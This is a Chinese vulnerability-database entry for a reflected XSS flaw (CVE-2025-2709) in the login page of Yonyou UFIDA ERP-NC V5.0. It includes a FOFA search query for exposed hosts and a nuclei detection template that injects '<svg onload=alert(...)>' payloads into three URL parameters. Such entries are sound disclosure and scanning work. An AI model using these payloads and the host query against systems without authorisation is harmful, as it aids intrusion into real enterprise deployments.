漏洞信息
漏洞名称: Yonyou UFIDA ERP-NC V5.0 跨站脚本漏洞
漏洞编号:
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: Yonyou UFIDA ERP-NC V5.0是一款广泛使用的企业资源规划(ERP)系统,旨在为企业提供财务、供应链、人力资源等多方面的管理解决方案。该系统在中国及其他地区的企业中有着广泛的应用,是企业信息化建设的重要组成部分。该漏洞存在于系统的登录页面(login.jsp)中,通过key和redirect参数,攻击者可以注入恶意脚本,实现跨站脚本攻击(XSS)。漏洞的根本原因在于系统未对用户输入进行充分的过滤和转义处理,导致恶意脚本被直接反射到响应中,从而在用户浏览器中执行。这种漏洞可以被利用来窃取用户的会话令牌、重定向用户到恶意网站或在用户浏览器中执行其他恶意操作。由于攻击者需要诱使用户访问特制的链接,因此攻击的复杂度相对较高,但一旦成功,可能对企业的信息安全造成严重影响。
产品厂商: yonyou
产品名称: ufida_erp-nc
影响版本: 5.0
搜索语法: icon_hash=”1085941792”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/f40ee51fffec48eec75ce85caf6664e5df66be17/http%2Fcves%2F2025%2FCVE-2025-2709.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| id: CVE-2025-2709
info: name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the key and redirect parameters in login.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. reference: - https://github.com/Hebing123/cve/issues/84 - https://nvd.nist.gov/vuln/detail/CVE-2025-2709 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-2709 cwe-id: CWE-79 cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: yonyou product: ufida_erp-nc fofa-query: icon_hash="1085941792" tags: cve,cve2025,xss,erp-nc,ufida,yonyou
http: - method: GET path: - "{{BaseURL}}/login.jsp?onlyOnePerVM=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/login.jsp?redirect=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E" - "{{BaseURL}}/login.jsp?nodeid=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E"
stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '<svg onload=alert(document.domain)>' - 'this explore not support plug in' condition: and
- type: word part: content_type words: - 'text/html'
- type: status status: - 200
|